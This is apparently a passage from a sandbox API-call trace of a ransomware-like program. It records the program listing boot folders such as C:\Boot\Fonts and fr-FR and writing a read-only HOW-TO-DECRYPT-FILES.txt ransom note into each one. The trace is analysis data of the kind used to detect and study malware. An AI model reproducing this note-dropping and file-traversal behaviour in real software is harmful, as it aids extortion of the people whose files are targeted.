lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.000] GetLastError () returned 0x0 [0045.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.000] GetLastError () returned 0x0 [0045.000] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0045.000] GetLastError () returned 0x0 [0045.000] SetErrorMode (uMode=0x1) returned 0x0 [0045.000] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.000] GetLastError () returned 0x0 [0045.000] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.000] GetLastError () returned 0x0 [0045.000] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.000] GetLastError () returned 0x0 [0045.000] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.000] GetLastError () returned 0x12 [0045.000] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.001] SetErrorMode (uMode=0x0) returned 0x1 [0045.001] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0045.001] GetLastError () returned 0x12 [0045.001] SetErrorMode (uMode=0x1) returned 0x0 [0045.001] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.001] GetLastError () returned 0x12 [0045.001] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.001] GetLastError () returned 0x12 [0045.001] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.001] GetLastError () returned 0x12 [0045.001] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.001] GetLastError () returned 0x12 [0045.001] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.001] SetErrorMode (uMode=0x0) returned 0x1 [0045.001] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.001] GetLastError () returned 0x12 [0045.001] SetErrorMode (uMode=0x1) returned 0x0 [0045.001] GetFileAttributesExW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1b872f0 | out: lpFileInformation=0x1b872f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552c0f00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40)) returned 1 [0045.002] GetLastError () returned 0x12 [0045.002] SetErrorMode (uMode=0x0) returned 0x1 [0045.002] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.002] GetLastError () returned 0x12 [0045.002] SetErrorMode (uMode=0x1) returned 0x0 [0045.002] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\fi-fi\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.002] GetLastError () returned 0x0 [0045.002] GetFileType (hFile=0x184) returned 0x1 [0045.002] SetErrorMode (uMode=0x0) returned 0x1 [0045.002] GetFileType (hFile=0x184) returned 0x1 [0045.002] WriteFile (in: hFile=0x184, lpBuffer=0x1ba2e04*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1ba2e04*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.003] GetLastError () returned 0x0 [0045.003] CloseHandle (hObject=0x184) returned 1 [0045.003] GetLastError () returned 0x0 [0045.003] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.003] GetLastError () returned 0x0 [0045.004] SetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.004] GetLastError () returned 0x0 [0045.004] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0045.004] GetLastError () returned 0x0 [0045.004] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.004] GetLastError () returned 0x0 [0045.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.004] GetLastError () returned 0x0 [0045.004] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0045.004] GetLastError () returned 0x0 [0045.004] SetErrorMode (uMode=0x1) returned 0x0 [0045.004] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.004] GetLastError () returned 0x0 [0045.004] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.004] GetLastError () returned 0x0 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x0 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x0 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x0 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x0 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x0 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.005] GetLastError () returned 0x12 [0045.005] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.005] SetErrorMode (uMode=0x0) returned 0x1 [0045.005] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0045.005] GetLastError () returned 0x12 [0045.005] SetErrorMode (uMode=0x1) returned 0x0 [0045.005] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.005] GetLastError () returned 0x12 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x12 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x12 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x12 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x12 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x12 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.005] GetLastError () returned 0x12 [0045.005] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.005] GetLastError () returned 0x12 [0045.005] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.005] SetErrorMode (uMode=0x0) returned 0x1 [0045.005] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\chs_boot.ttf", lpFilePart=0x0) returned 0x1a [0045.005] GetLastError () returned 0x12 [0045.005] SetErrorMode (uMode=0x1) returned 0x0 [0045.006] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x1ba5e08 | out: lpFileInformation=0x1ba5e08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f1a00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x553f1a00, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x8de004dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x385e00)) returned 1 [0045.006] GetLastError () returned 0x12 [0045.006] SetErrorMode (uMode=0x0) returned 0x1 [0045.006] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.006] GetLastError () returned 0x12 [0045.006] SetErrorMode (uMode=0x1) returned 0x0 [0045.006] CreateFileW (lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\fonts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.007] GetLastError () returned 0x0 [0045.007] GetFileType (hFile=0x184) returned 0x1 [0045.007] SetErrorMode (uMode=0x0) returned 0x1 [0045.007] GetFileType (hFile=0x184) returned 0x1 [0045.007] WriteFile (in: hFile=0x184, lpBuffer=0x1bc1910*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1bc1910*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.008] GetLastError () returned 0x0 [0045.008] CloseHandle (hObject=0x184) returned 1 [0045.008] GetLastError () returned 0x0 [0045.008] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.008] GetLastError () returned 0x0 [0045.008] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.009] GetLastError () returned 0x0 [0045.009] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\cht_boot.ttf", lpFilePart=0x0) returned 0x1a [0045.009] GetLastError () returned 0x0 [0045.009] SetErrorMode (uMode=0x1) returned 0x0 [0045.009] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x1bc355c | out: lpFileInformation=0x1bc355c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55463e20, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x55463e20, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x8dfef6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4)) returned 1 [0045.009] GetLastError () returned 0x0 [0045.009] SetErrorMode (uMode=0x0) returned 0x1 [0045.009] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.009] GetLastError () returned 0x0 [0045.009] SetErrorMode (uMode=0x1) returned 0x0 [0045.009] CreateFileW (lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\fonts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.009] GetLastError () returned 0x5 [0045.010] SetErrorMode (uMode=0x0) returned 0x1 [0045.010] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\jpn_boot.ttf", lpFilePart=0x0) returned 0x1a [0045.010] GetLastError () returned 0x5 [0045.010] SetErrorMode (uMode=0x1) returned 0x0 [0045.010] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x1be12b8 | out: lpFileInformation=0x1be12b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x554d6240, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x554d6240, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x8e1201bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4)) returned 1 [0045.010] GetLastError () returned 0x5 [0045.010] SetErrorMode (uMode=0x0) returned 0x1 [0045.011] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.011] GetLastError () returned 0x5 [0045.011] SetErrorMode (uMode=0x1) returned 0x0 [0045.011] CreateFileW (lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\fonts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.011] GetLastError () returned 0x5 [0045.011] SetErrorMode (uMode=0x0) returned 0x1 [0045.011] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\kor_boot.ttf", lpFilePart=0x0) returned 0x1a [0045.011] GetLastError () returned 0x5 [0045.011] SetErrorMode (uMode=0x1) returned 0x0 [0045.011] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x1bff014 | out: lpFileInformation=0x1bff014*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x554fc3a0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x554fc3a0, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x8e30f39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x242f20)) returned 1 [0045.012] GetLastError () returned 0x5 [0045.012] SetErrorMode (uMode=0x0) returned 0x1 [0045.012] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.012] GetLastError () returned 0x5 [0045.012] SetErrorMode (uMode=0x1) returned 0x0 [0045.012] CreateFileW (lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\fonts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.012] GetLastError () returned 0x5 [0045.013] SetErrorMode (uMode=0x0) returned 0x1 [0045.013] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\wgl4_boot.ttf", lpFilePart=0x0) returned 0x1b [0045.013] GetLastError () returned 0x5 [0045.013] SetErrorMode (uMode=0x1) returned 0x0 [0045.013] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x1c1cd70 | out: lpFileInformation=0x1c1cd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55548660, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x55548660, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x8e3817bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xb95c)) returned 1 [0045.013] GetLastError () returned 0x5 [0045.013] SetErrorMode (uMode=0x0) returned 0x1 [0045.013] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.013] GetLastError () returned 0x5 [0045.013] SetErrorMode (uMode=0x1) returned 0x0 [0045.013] CreateFileW (lpFileName="C:\\Boot\\Fonts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\fonts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.013] GetLastError () returned 0x5 [0045.014] SetErrorMode (uMode=0x0) returned 0x1 [0045.014] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0045.014] GetLastError () returned 0x5 [0045.014] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.014] GetLastError () returned 0x5 [0045.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.014] GetLastError () returned 0x5 [0045.014] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0045.014] GetLastError () returned 0x5 [0045.014] SetErrorMode (uMode=0x1) returned 0x0 [0045.014] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.014] GetLastError () returned 0x5 [0045.014] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.014] GetLastError () returned 0x5 [0045.014] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.014] GetLastError () returned 0x5 [0045.014] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.015] GetLastError () returned 0x12 [0045.015] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.015] SetErrorMode (uMode=0x0) returned 0x1 [0045.015] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0045.015] GetLastError () returned 0x12 [0045.015] SetErrorMode (uMode=0x1) returned 0x0 [0045.015] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.015] GetLastError () returned 0x12 [0045.015] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.015] GetLastError () returned 0x12 [0045.015] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.015] GetLastError () returned 0x12 [0045.015] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.015] GetLastError () returned 0x12 [0045.015] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.015] SetErrorMode (uMode=0x0) returned 0x1 [0045.015] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0045.015] GetLastError () returned 0x12 [0045.015] SetErrorMode (uMode=0x1) returned 0x0 [0045.015] GetFileAttributesExW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x1c3bb88 | out: lpFileInformation=0x1c3bb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e7060, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8bd1da0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40)) returned 1 [0045.015] GetLastError () returned 0x12 [0045.015] SetErrorMode (uMode=0x0) returned 0x1 [0045.015] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.015] GetLastError () returned 0x12 [0045.015] SetErrorMode (uMode=0x1) returned 0x0 [0045.016] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\boot\\fr-fr\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.016] GetLastError () returned 0x0 [0045.016] GetFileType (hFile=0x184) returned 0x1 [0045.016] SetErrorMode (uMode=0x0) returned 0x1 [0045.016] GetFileType (hFile=0x184) returned 0x1 [0045.016] WriteFile (in: hFile=0x184, lpBuffer=0x1c57914*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ee04, lpOverlapped=0x0 | out: lpBuffer=0x1c57914*, lpNumberOfBytesWritten=0x18ee04*=0x18da, lpOverlapped=0x0) returned 1 [0045.017] GetLastError () returned 0x0 [0045.017] CloseHandle (hObject=0x184) returned 1 [0045.017] GetLastError () returned 0x0 [0045.017] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e9cc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x26 [0045.017] GetLastError () returned 0x0 [0045.017] SetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.017] GetLastError () returned 0x0 [0045.017] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x18ea6c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0045.017] GetLastError () returned 0x0 [0045.017] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.017] GetLastError () returned 0x0 [0045.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.017] GetLastError () returned 0x0 [0045.017] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0045.017] GetLastError () returned 0x0 [0045.017] SetErrorMode (uMode=0x1) returned 0x0 [0045.017] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0045.018] GetLastError () returned 0x0 [0045.018] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.018] GetLastError () returned 0x0 [0045.018] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.018] GetLastError () returned 0x0 [0045.018] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.018] GetLastError () returned 0x12 [0045.018] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0045.018] SetErrorMode (uMode=0x0) returned 0x1 [0045.018] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x18e944, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0045.018] GetLastError () returned 0x12 [0045.018] SetErrorMode (uMode=0x1) returned 0x0 [0045.018] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x364560 | out: 